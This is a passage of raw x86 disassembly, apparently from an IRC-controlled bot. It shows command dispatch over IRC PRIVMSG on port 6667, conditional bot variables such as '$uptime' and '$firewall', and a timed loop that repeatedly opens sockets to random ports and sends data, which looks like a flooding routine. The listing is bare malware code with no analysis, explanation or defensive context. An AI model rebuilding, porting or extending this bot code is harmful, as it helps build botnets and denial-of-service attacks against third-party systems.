call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6392]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6395]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6398]
push eax
call sub_40A8AD
pop ecx
push eax
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419860
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 1Ch
jmp short loc_40C375
; ---------------------------------------------------------------------------
loc_40C35B: ; CODE XREF: sub_40A9CF+1866�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419844
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40C375: ; CODE XREF: sub_40A9CF+198A�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C37A: ; CODE XREF: sub_40A9CF+1818�j
mov eax, [ebp+var_1A8]
sub eax, dword_419838
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C4B0
call sub_416B64 ; clock
mov [ebp+var_639C], eax
and [ebp+var_63A4], 0
and [ebp+var_63A0], 0
push 10h
push 0
lea eax, [ebp+var_63B4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_63B4], 2
loc_40C3C8: ; CODE XREF: sub_40A9CF+1A95�j
call sub_416B64 ; clock
sub eax, [ebp+var_639C]
cmp eax, 3E8h
jnb loc_40C469
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
push eax
call dword_417238 ; htons
mov [ebp+var_63B2], ax
push 4
push 0
call sub_4040E8
pop ecx
pop ecx
mov [ebp+var_63B0], eax
push 0
push 2
push 2
call dword_417218 ; socket
mov [ebp+var_63B8], eax
push 10h
lea eax, [ebp+var_63B4]
push eax
push [ebp+var_63B8]
call dword_4171F4 ; connect
push 0
push 1
lea eax, [ebp+var_63A0]
push eax
push [ebp+var_63B8]
call dword_41720C ; send
push [ebp+var_63B8]
call dword_417230 ; closesocket
mov eax, [ebp+var_63A4]
add eax, 2Bh
mov [ebp+var_63A4], eax
jmp loc_40C3C8
; ---------------------------------------------------------------------------
loc_40C469: ; CODE XREF: sub_40A9CF+1A09�j
cmp [ebp+var_63A4], 400h
jbe short loc_40C483
mov eax, [ebp+var_63A4]
mov [ebp+var_6408], eax
jmp short loc_40C48D
; ---------------------------------------------------------------------------
loc_40C483: ; CODE XREF: sub_40A9CF+1AA4�j
mov [ebp+var_6408], 400h
loc_40C48D: ; CODE XREF: sub_40A9CF+1AB2�j
mov eax, [ebp+var_6408]
shr eax, 0Ah
push eax
push offset dword_419820
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C4B0: ; CODE XREF: sub_40A9CF+19BE�j
mov eax, [ebp+var_1A8]
sub eax, dword_419818
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C4DA
mov eax, [ebp+var_1A8]
sub eax, dword_41980C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C4FF
loc_40C4DA: ; CODE XREF: sub_40A9CF+1AF4�j
push offset dword_41DC00
push 3B7h
push 0
push offset dword_4197E8
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 14h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C4FF: ; CODE XREF: sub_40A9CF+1B09�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197DC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C53A
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4142BF
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C53A: ; CODE XREF: sub_40A9CF+1B43�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197D4
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C564
mov eax, [ebp+var_1A8]
sub eax, dword_4197C8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C576
loc_40C564: ; CODE XREF: sub_40A9CF+1B7E�j
lea eax, [ebp+var_1A4]
push eax
call sub_4087C4
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C576: ; CODE XREF: sub_40A9CF+1B93�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197C0
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C5A0
mov eax, [ebp+var_1A8]
sub eax, dword_4197B4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C5B2
loc_40C5A0: ; CODE XREF: sub_40A9CF+1BBA�j
lea eax, [ebp+var_1A4]
push eax
call sub_408E4A
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C5B2: ; CODE XREF: sub_40A9CF+1BCF�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197A4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C614
push 1
push offset a9252 ; "9252"
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_63BC], eax
push [ebp+var_63BC]
push offset dword_418B5C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
cmp [ebp+var_63BC], 0
jnz short loc_40C603
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C603: ; CODE XREF: sub_40A9CF+1C2D�j
push [ebp+var_63BC]
call sub_404CBB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C614: ; CODE XREF: sub_40A9CF+1BF6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419790
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C63B
lea eax, [ebp+var_1A4]
push eax
call sub_4091E2
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C63B: ; CODE XREF: sub_40A9CF+1C58�j
mov eax, [ebp+var_1A8]
sub eax, dword_419788
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C669
mov eax, [ebp+var_1A8]
sub eax, dword_41977C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C896
loc_40C669: ; CODE XREF: sub_40A9CF+1C7F�j
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C686
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_640C], eax
jmp short loc_40C68D
; ---------------------------------------------------------------------------
loc_40C686: ; CODE XREF: sub_40A9CF+1CA1�j
and [ebp+var_640C], 0
loc_40C68D: ; CODE XREF: sub_40A9CF+1CB5�j
mov eax, [ebp+var_640C]
mov [ebp+var_63C8], eax
call sub_4092A4
mov [ebp+var_63E0], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_63D8], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_63C4], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_63D4], eax
mov eax, [ebp+var_63D8]
cmp eax, [ebp+var_63C8]
jnb short loc_40C715
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C715: ; CODE XREF: sub_40A9CF+1D3F�j
call sub_409318
mov [ebp+var_63C0], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_63CC], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_63DC], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_63D0], eax
cmp [ebp+var_63D0], 1
jnz short loc_40C793
mov [ebp+var_6410], offset byte_41DE00
jmp short loc_40C79D
; ---------------------------------------------------------------------------
loc_40C793: ; CODE XREF: sub_40A9CF+1DB6�j
mov [ebp+var_6410], offset dword_4191F4
loc_40C79D: ; CODE XREF: sub_40A9CF+1DC2�j
cmp [ebp+var_63DC], 1
jnz short loc_40C7B2
mov [ebp+var_6414], offset byte_41DE00
jmp short loc_40C7BC
; ---------------------------------------------------------------------------
loc_40C7B2: ; CODE XREF: sub_40A9CF+1DD5�j
mov [ebp+var_6414], offset dword_4191F4
loc_40C7BC: ; CODE XREF: sub_40A9CF+1DE1�j
cmp [ebp+var_63CC], 1
jnz short loc_40C7D1
mov [ebp+var_6418], offset byte_41DE00
jmp short loc_40C7DB
; ---------------------------------------------------------------------------
loc_40C7D1: ; CODE XREF: sub_40A9CF+1DF4�j
mov [ebp+var_6418], offset dword_4191F4
loc_40C7DB: ; CODE XREF: sub_40A9CF+1E00�j
cmp [ebp+var_63D4], 1
jnz short loc_40C7F0
mov [ebp+var_641C], offset byte_41DE00
jmp short loc_40C7FA
; ---------------------------------------------------------------------------
loc_40C7F0: ; CODE XREF: sub_40A9CF+1E13�j
mov [ebp+var_641C], offset dword_4191F4
loc_40C7FA: ; CODE XREF: sub_40A9CF+1E1F�j
cmp [ebp+var_63C4], 1
jnz short loc_40C80F
mov [ebp+var_6420], offset byte_41DE00
jmp short loc_40C819
; ---------------------------------------------------------------------------
loc_40C80F: ; CODE XREF: sub_40A9CF+1E32�j
mov [ebp+var_6420], offset dword_4191F4
loc_40C819: ; CODE XREF: sub_40A9CF+1E3E�j
cmp [ebp+var_63D8], 1
jnz short loc_40C82E
mov [ebp+var_6424], offset byte_41DE00
jmp short loc_40C838
; ---------------------------------------------------------------------------
loc_40C82E: ; CODE XREF: sub_40A9CF+1E51�j
mov [ebp+var_6424], offset dword_4191F4
loc_40C838: ; CODE XREF: sub_40A9CF+1E5D�j
push [ebp+var_6410]
push [ebp+var_63D0]
push [ebp+var_6414]
push [ebp+var_63DC]
push [ebp+var_6418]
push [ebp+var_63CC]
push [ebp+var_641C]
push [ebp+var_63D4]
push [ebp+var_6420]
push [ebp+var_63C4]
push [ebp+var_6424]
push [ebp+var_63D8]
push offset dword_419708
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 38h
jmp short loc_40C912
; ---------------------------------------------------------------------------
loc_40C896: ; CODE XREF: sub_40A9CF+1C94�j
mov eax, [ebp+var_1A8]
sub eax, dword_419700
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C912
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C8BD
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jnz short loc_40C8BF
loc_40C8BD: ; CODE XREF: sub_40A9CF+1EE3�j
jmp short loc_40C912
; ---------------------------------------------------------------------------
loc_40C8BF: ; CODE XREF: sub_40A9CF+1EEC�j
push 2
push offset aId ; "id"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40C8EA
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
push offset byte_41EE98
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40C8EA: ; CODE XREF: sub_40A9CF+1F07�j
push offset aUsername ; "username"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40C912
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
push offset byte_41F018
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40C912: ; CODE XREF: sub_40A9CF+85�j
; sub_40A9CF+D8�j ...
pop edi
pop esi
leave
retn
sub_40A9CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C916 proc near ; CODE XREF: sub_40CA29+47F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
loc_40C919: ; CODE XREF: sub_40C916+1F�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_40C937
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C937
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
jmp short loc_40C919
; ---------------------------------------------------------------------------
loc_40C937: ; CODE XREF: sub_40C916+C�j
; sub_40C916+16�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_40C916 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C93C proc near ; DATA XREF: sub_40CEB0+66�o
var_534 = dword ptr -534h
var_530 = byte ptr -530h
var_38F = byte ptr -38Fh
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 534h
push 327h
push [ebp+arg_0]
lea eax, [ebp+var_534]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_208]
push eax
push offset asc_419F48 ; ";"
lea eax, [ebp+var_530]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_204], eax
and [ebp+var_20C], 0
loc_40C98D: ; CODE XREF: sub_40C93C+D6�j
cmp [ebp+var_204], 0
jnz short loc_40C998
jmp short loc_40CA17
; ---------------------------------------------------------------------------
loc_40C998: ; CODE XREF: sub_40C93C+58�j
; sub_40C93C+79�j
mov eax, [ebp+var_204]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40C9A8
jmp short loc_40C9B7
; ---------------------------------------------------------------------------
loc_40C9A8: ; CODE XREF: sub_40C93C+68�j
mov eax, [ebp+var_204]
inc eax
mov [ebp+var_204], eax
jmp short loc_40C998
; ---------------------------------------------------------------------------
loc_40C9B7: ; CODE XREF: sub_40C93C+6A�j
push [ebp+var_204]
lea eax, [ebp+var_38F]
push eax
push offset aLinkLink@linkP ; "link!link@link PRIVMSG %s :%s"
push 200h
lea eax, [ebp+var_200]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_200]
push eax
call sub_40E618
pop ecx
lea eax, [ebp+var_208]
push eax
push offset asc_419F48 ; ";"
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_20C], eax
mov eax, [ebp+var_20C]
mov [ebp+var_204], eax
jmp loc_40C98D
; ---------------------------------------------------------------------------
loc_40CA17: ; CODE XREF: sub_40C93C+5A�j
push [ebp+var_534]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_40C93C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA29 proc near ; CODE XREF: sub_40CEB0+8�p
var_1EC = dword ptr -1ECh
var_1E8 = byte ptr -1E8h
var_1C8 = byte ptr -1C8h
var_1A8 = dword ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = byte ptr -1A0h
var_190 = byte ptr -190h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1ECh
cmp [ebp+arg_0], 0
jz short loc_40CA43
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 28h
jz short loc_40CA4A
loc_40CA43: ; CODE XREF: sub_40CA29+D�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CA4A: ; CODE XREF: sub_40CA29+18�j
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
push offset asc_419FB0 ; ")"
push [ebp+arg_0]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_40CA70
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CA70: ; CODE XREF: sub_40CA29+3E�j
mov eax, [ebp+var_10]
sub eax, [ebp+arg_0]
inc eax
cmp eax, 180h
jbe short loc_40CA8A
mov [ebp+var_1EC], 180h
jmp short loc_40CA97
; ---------------------------------------------------------------------------
loc_40CA8A: ; CODE XREF: sub_40CA29+53�j
mov eax, [ebp+var_10]
sub eax, [ebp+arg_0]
inc eax
mov [ebp+var_1EC], eax
loc_40CA97: ; CODE XREF: sub_40CA29+5F�j
push [ebp+var_1EC]
push [ebp+arg_0]
lea eax, [ebp+var_190]
push eax
call sub_407A56
add esp, 0Ch
push 1
push 1
lea eax, [ebp+var_190]
push eax
call sub_407C2C
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
push offset asc_419FAC ; "&&"
lea eax, [ebp+var_190]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_4], eax
and [ebp+var_C], 0
loc_40CAE1: ; CODE XREF: sub_40CA29+475�j
cmp [ebp+var_4], 0
jnz short loc_40CAEC
jmp loc_40CEA3
; ---------------------------------------------------------------------------
loc_40CAEC: ; CODE XREF: sub_40CA29+BC�j
; sub_40CA29+D7�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40CAF9
jmp short loc_40CB02
; ---------------------------------------------------------------------------
loc_40CAF9: ; CODE XREF: sub_40CA29+CC�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp short loc_40CAEC
; ---------------------------------------------------------------------------
loc_40CB02: ; CODE XREF: sub_40CA29+CE�j
lea eax, [ebp+var_1E8]
push eax
lea eax, [ebp+var_1A0]
push eax
lea eax, [ebp+var_1C8]
push eax
push offset a32s16s32s ; "%32s %16s %32s"
push [ebp+var_4]
call sub_416BA2 ; sscanf
add esp, 14h
cmp eax, 3
jz short loc_40CB33
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CB33: ; CODE XREF: sub_40CA29+101�j
lea eax, [ebp+var_1C8]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1A4], eax
lea eax, [ebp+var_1E8]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1A8], eax
cmp [ebp+var_1A4], 0
jnz loc_40CC6E
push offset dword_418F50
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz loc_40CC6E
push offset aUptime ; "$uptime"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBB1
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_1A4], eax
jmp loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBB1: ; CODE XREF: sub_40CA29+16D�j
push offset aVersion ; "$version"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBD7
mov [ebp+var_1A4], 3B7h
jmp loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBD7: ; CODE XREF: sub_40CA29+19D�j
push offset aFree_0 ; "$free"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBFB
call sub_408E8E
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBFB: ; CODE XREF: sub_40CA29+1C3�j
push offset aLatency ; "$latency"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC1F
call sub_408887
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC1F: ; CODE XREF: sub_40CA29+1E7�j
push offset aFirewall ; "$firewall"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC43
call sub_404279
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC43: ; CODE XREF: sub_40CA29+20B�j
push offset aIpv6 ; "$ipv6"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC67
call sub_4043E9
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC67: ; CODE XREF: sub_40CA29+22F�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CC6E: ; CODE XREF: sub_40CA29+137�j
; sub_40CA29+152�j ...
cmp [ebp+var_1A8], 0
jnz loc_40CD83
push offset dword_418F50
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz loc_40CD83
push offset aUptime ; "$uptime"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CCC6
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_1A8], eax
jmp loc_40CD83
; ---------------------------------------------------------------------------
loc_40CCC6: ; CODE XREF: sub_40CA29+282�j
push offset aVersion ; "$version"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CCEC
mov [ebp+var_1A8], 3B7h
jmp loc_40CD83
; ---------------------------------------------------------------------------
loc_40CCEC: ; CODE XREF: sub_40CA29+2B2�j
push offset aFree_0 ; "$free"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD10
call sub_408E8E
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD10: ; CODE XREF: sub_40CA29+2D8�j
push offset aLatency ; "$latency"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD34
call sub_408887
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD34: ; CODE XREF: sub_40CA29+2FC�j
push offset aFirewall ; "$firewall"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD58
call sub_404279
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD58: ; CODE XREF: sub_40CA29+320�j
push offset aIpv6 ; "$ipv6"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD7C
call sub_4043E9
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD7C: ; CODE XREF: sub_40CA29+344�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CD83: ; CODE XREF: sub_40CA29+24C�j
; sub_40CA29+267�j ...
push offset asc_419F5C ; "=="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CDAF
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jz short loc_40CDAF
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CDAF: ; CODE XREF: sub_40CA29+36F�j
; sub_40CA29+37D�j
push offset asc_419F58 ; "!="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CDDB
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jnz short loc_40CDDB
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CDDB: ; CODE XREF: sub_40CA29+39B�j
; sub_40CA29+3A9�j
push offset asc_419F54 ; ">"
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE07
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
ja short loc_40CE07
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE07: ; CODE XREF: sub_40CA29+3C7�j
; sub_40CA29+3D5�j
push offset asc_419F50 ; ">="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE30
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jnb short loc_40CE30
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE30: ; CODE XREF: sub_40CA29+3F3�j
; sub_40CA29+401�j
push offset dword_419968
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE59
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jb short loc_40CE59
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE59: ; CODE XREF: sub_40CA29+41C�j
; sub_40CA29+42A�j
push offset asc_419F4C ; "<="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE82
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jbe short loc_40CE82
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE82: ; CODE XREF: sub_40CA29+445�j
; sub_40CA29+453�j
lea eax, [ebp+var_8]
push eax
push offset asc_419FAC ; "&&"
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
jmp loc_40CAE1
; ---------------------------------------------------------------------------
loc_40CEA3: ; CODE XREF: sub_40CA29+BE�j
mov eax, [ebp+var_10]
inc eax
push eax
call sub_40C916
pop ecx
locret_40CEAE: ; CODE XREF: sub_40CA29+1C�j
; sub_40CA29+42�j ...
leave
retn
sub_40CA29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CEB0 proc near ; CODE XREF: sub_40A9CF+14CE�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_4]
call sub_40CA29
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40CEC9
jmp short locret_40CF23
; ---------------------------------------------------------------------------
loc_40CEC9: ; CODE XREF: sub_40CEB0+15�j
push 327h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40CEDF
jmp short locret_40CF23
; ---------------------------------------------------------------------------
loc_40CEDF: ; CODE XREF: sub_40CEB0+2B�j
push 180h
push [ebp+var_8]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 184h
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+var_8]
push offset aExecutingComma ; "Executing command(s): %s"
push 0
push [ebp+var_4]
push offset sub_40C93C
call sub_4095A4
add esp, 14h
locret_40CF23: ; CODE XREF: sub_40CEB0+17�j
; sub_40CEB0+2D�j
leave
retn
sub_40CEB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CF25 proc near ; CODE XREF: sub_4020C2+B3�p
; sub_40D871+59B�p ...
push ebp
mov ebp, esp
mov eax, dword_41E974
pop ebp
retn
sub_40CF25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CF2F proc near ; CODE XREF: sub_40D366+D�p
; sub_40D366+8E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
jz short loc_40CF9E
push [ebp+arg_0]
push offset dword_41E868
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp [ebp+arg_4], 0
jz short loc_40CF60
push [ebp+arg_4]
push offset dword_41E968
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40CF71
; ---------------------------------------------------------------------------
loc_40CF60: ; CODE XREF: sub_40CF2F+1E�j
push offset a6667 ; "6667"
push offset dword_41E968
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40CF71: ; CODE XREF: sub_40CF2F+2F�j
cmp [ebp+arg_8], 0
jz short loc_40CF88
push [ebp+arg_8]
push offset byte_41E6E8
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40CF99
; ---------------------------------------------------------------------------
loc_40CF88: ; CODE XREF: sub_40CF2F+46�j
push offset byte_41DE00
push offset byte_41E6E8
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40CF99: ; CODE XREF: sub_40CF2F+57�j
jmp loc_40D020
; ---------------------------------------------------------------------------
loc_40CF9E: ; CODE XREF: sub_40CF2F+9�j
and [ebp+var_4], 0
jmp short loc_40CFAB
; ---------------------------------------------------------------------------
loc_40CFA4: ; CODE XREF: sub_40CF2F+8B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40CFAB: ; CODE XREF: sub_40CF2F+73�j
mov eax, [ebp+var_4]
imul eax, 0Ch
cmp off_41DA40[eax], 0
jz short loc_40CFBC
jmp short loc_40CFA4
; ---------------------------------------------------------------------------
loc_40CFBC: ; CODE XREF: sub_40CF2F+89�j
call sub_410422
xor edx, edx
div [ebp+var_4]
